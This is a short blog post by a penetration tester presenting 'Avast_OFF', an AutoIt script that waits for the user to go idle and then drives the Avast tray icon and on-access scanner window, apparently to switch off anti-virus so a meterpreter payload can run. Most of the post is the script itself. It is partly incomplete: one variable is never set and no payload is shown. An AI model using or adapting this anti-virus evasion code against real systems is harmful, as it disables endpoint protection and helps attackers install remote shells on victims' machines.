After a four-part investigation (really an introduction; I was working on tutorials) into bypassing anti-virus, an update to the target product slapped me in the face and halted the mechanisms I had been using for circumvention. I needed a solution that would let me continue deploying meterpreter, and Avast_OFF is what I came up with.

I was looking for some way, any way, to bypass the product in question, just to see how easy it was with today's tools. I had seen AutoIT used in the past, and it offered everything I needed: an easy way to script GUI interaction without learning to program. Most applications are designed to interact with the end user, and anti-virus products are no different, so using AutoIT to mimic the user's actions should work. So long as the anti-virus product allows us to execute and the user behaves as expected, the result is the same: my payload is delivered and I get the shell I'm really after.

[The script]
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=..\..\..\..\Program Files\AutoIt3\Icons\filetype-blank.ico
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <Timers.au3>        ; _Timer_GetIdleTime()
#include "SysTray_UDF.au3"   ; _FindTrayToolbarWindow(), _SysTrayIconIndex(), _SysTrayIconPos()

; $ApplicationX is used below but is never assigned in the posted script;
; it is meant to hold the tooltip text of the target's tray icon.

Global $iIdleTime = _Timer_GetIdleTime()

; Wait for 60 seconds of user inactivity (idle time is reported in milliseconds).
While $iIdleTime < 60000
    $iIdleTime = _Timer_GetIdleTime()
    MsgBox(0, "I think we're alone", "If you left me longer than 60 seconds you're in for it [" & $iIdleTime & "]", 2)
WEnd

$class = "classname=Shell_TrayWnd"
$hControl = ControlGetHandle($class, "", "Button1")

; Get the tray position and move the mouse there.
$posTray = WinGetPos(_FindTrayToolbarWindow())
MouseMove($posTray[0], $posTray[1])

; If the XP "Hide inactive icons" mode is active, expand the tray first.
If $hControl <> "" And ControlCommand($class, "", $hControl, "IsVisible", "") Then
    ControlClick($class, "", $hControl)
EndIf

; Locate the target's tray icon and move the mouse onto it.
$index = _SysTrayIconIndex($ApplicationX)
If $index <> -1 Then
    $pos = _SysTrayIconPos($index)
    If $pos = -1 Then
        MsgBox(0, "Not Found", $ApplicationX, 30)
    Else
        MouseMove($pos[0], $pos[1])
    EndIf
EndIf

If Not WinActive("avast! On-Access Scanner", "") Then WinActivate("avast! On-Access Scanner", "")
WinWaitActive("avast! On-Access Scanner", "")
MsgBox(0, "So far so good!", "With any luck AV is now off and the payload is about to be launched", 4)

There is nothing new in this information; it was just an exercise for myself, but this is my only blog, so I have posted the code here.

© 2020   Created by Marcus J. Carey.